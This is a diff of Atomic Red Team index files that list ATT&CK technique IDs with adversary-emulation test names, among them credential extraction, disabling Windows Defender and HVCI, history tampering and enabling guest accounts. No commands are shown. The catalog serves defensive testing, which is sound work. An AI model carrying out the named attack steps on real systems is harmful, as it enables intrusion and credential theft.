discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
|
||||
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
|
||||
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
|
||||
|
||||
|
@@ -45,6 +45,7 @@ defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's cr
|
||||
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
|
||||
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
|
||||
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
|
||||
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
|
||||
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
|
||||
@@ -98,6 +99,7 @@ persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10
|
||||
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
|
||||
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
|
||||
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
|
||||
persistence,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
|
||||
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
|
||||
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
|
||||
@@ -127,6 +129,7 @@ privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab
|
||||
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
|
||||
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
|
||||
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
|
||||
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
|
||||
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
|
||||
@@ -162,9 +165,10 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Priva
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
|
||||
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
|
||||
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
|
||||
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
|
||||
@@ -197,8 +201,8 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
|
||||
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
|
||||
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
|
||||
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
|
||||
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
|
||||
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
|
||||
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
|
||||
@@ -224,6 +228,7 @@ execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript
|
||||
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
|
||||
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
|
||||
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
|
||||
initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
|
||||
|
||||
|
@@ -261,6 +261,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Bl
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
|
||||
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
|
||||
@@ -803,14 +804,14 @@ credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray usin
|
||||
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
|
||||
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
|
||||
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
|
||||
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
|
||||
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
|
||||
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
|
||||
@@ -979,12 +980,12 @@ discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers
|
||||
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
|
||||
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
|
||||
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
|
||||
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
|
||||
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
|
||||
discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
|
||||
discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
|
||||
discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
|
||||
discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
|
||||
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
|
||||
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
|
||||
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
|
||||
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
|
||||
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
|
||||
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
|
||||
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
|
||||
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
|
||||
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
|
||||
|
||||
|
@@ -3,7 +3,8 @@
|
||||
- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
|
||||
- Atomic Test #1: Container and ResourceDiscovery [containers]
|
||||
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #9: Network Service Discovery for Containers [containers]
|
||||
|
||||
# credential-access
|
||||
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -70,7 +71,8 @@
|
||||
- Atomic Test #1: Deploy Docker container [containers]
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1612 Build Image on Host](../../T1612/T1612.md)
|
||||
- Atomic Test #1: Build Image On Host [containers]
|
||||
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -73,7 +73,7 @@
|
||||
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
|
||||
- Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
|
||||
- T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1046 Network Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
|
||||
@@ -330,6 +330,7 @@
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
|
||||
- Atomic Test #2: Activate Guest Account [windows]
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
@@ -397,7 +398,8 @@
|
||||
- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1612 Build Image on Host](../../T1612/T1612.md)
|
||||
- Atomic Test #1: Build Image On Host [containers]
|
||||
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -429,6 +431,11 @@
|
||||
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
|
||||
- Atomic Test #1: Disable history collection [linux, macos]
|
||||
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
|
||||
- Atomic Test #3: Clear bash history [linux]
|
||||
- Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
|
||||
- Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
|
||||
- Atomic Test #6: Setting the HISTFILE environment variable [linux]
|
||||
- Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
|
||||
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
|
||||
@@ -503,6 +510,7 @@
|
||||
- Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
|
||||
- Atomic Test #42: Clear Pagging Cache [linux]
|
||||
- Atomic Test #43: Disable Memory Swap [linux]
|
||||
- Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
|
||||
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -816,6 +824,7 @@
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
|
||||
- Atomic Test #2: Activate Guest Account [windows]
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
|
||||
- Atomic Test #1: Create a new time provider [windows]
|
||||
- Atomic Test #2: Edit an existing time provider [windows]
|
||||
@@ -1303,6 +1312,7 @@
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
|
||||
- Atomic Test #2: Activate Guest Account [windows]
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
|
||||
- Atomic Test #1: Create a new time provider [windows]
|
||||
- Atomic Test #2: Edit an existing time provider [windows]
|
||||
@@ -1841,17 +1851,18 @@
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #2: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #3: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #4: Access unattend.xml [windows]
|
||||
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
|
||||
- Atomic Test #6: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #7: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #8: WinPwn - powershellsensitive [windows]
|
||||
- Atomic Test #9: WinPwn - passhunt [windows]
|
||||
- Atomic Test #10: WinPwn - SessionGopher [windows]
|
||||
- Atomic Test #11: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #3: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #4: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #5: Access unattend.xml [windows]
|
||||
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
|
||||
- Atomic Test #7: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #8: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #9: WinPwn - powershellsensitive [windows]
|
||||
- Atomic Test #10: WinPwn - passhunt [windows]
|
||||
- Atomic Test #11: WinPwn - SessionGopher [windows]
|
||||
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
|
||||
- Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
|
||||
@@ -2110,6 +2121,7 @@
|
||||
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
|
||||
- Atomic Test #5: Wmic Group Discovery [windows]
|
||||
- Atomic Test #6: WMIObject Group Discovery [windows]
|
||||
- Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
|
||||
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
|
||||
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
|
||||
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
|
||||
@@ -2164,7 +2176,7 @@
|
||||
- Atomic Test #18: Get-DomainController with PowerView [windows]
|
||||
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
|
||||
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- Atomic Test #3: Port Scan NMap for Windows [windows]
|
||||
@@ -2173,6 +2185,7 @@
|
||||
- Atomic Test #6: WinPwn - MS17-10 [windows]
|
||||
- Atomic Test #7: WinPwn - bluekeep [windows]
|
||||
- Atomic Test #8: WinPwn - fruit [windows]
|
||||
- Atomic Test #9: Network Service Discovery for Containers [containers]
|
||||
- [T1518 Software Discovery](../../T1518/T1518.md)
|
||||
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
|
||||
- Atomic Test #2: Applications Installed [windows]
|
||||
@@ -2478,6 +2491,7 @@
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
|
||||
- Atomic Test #2: Activate Guest Account [windows]
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -117,6 +117,11 @@
|
||||
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
|
||||
- Atomic Test #1: Disable history collection [linux, macos]
|
||||
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
|
||||
- Atomic Test #3: Clear bash history [linux]
|
||||
- Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
|
||||
- Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
|
||||
- Atomic Test #6: Setting the HISTFILE environment variable [linux]
|
||||
- Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
|
||||
@@ -433,8 +438,9 @@
|
||||
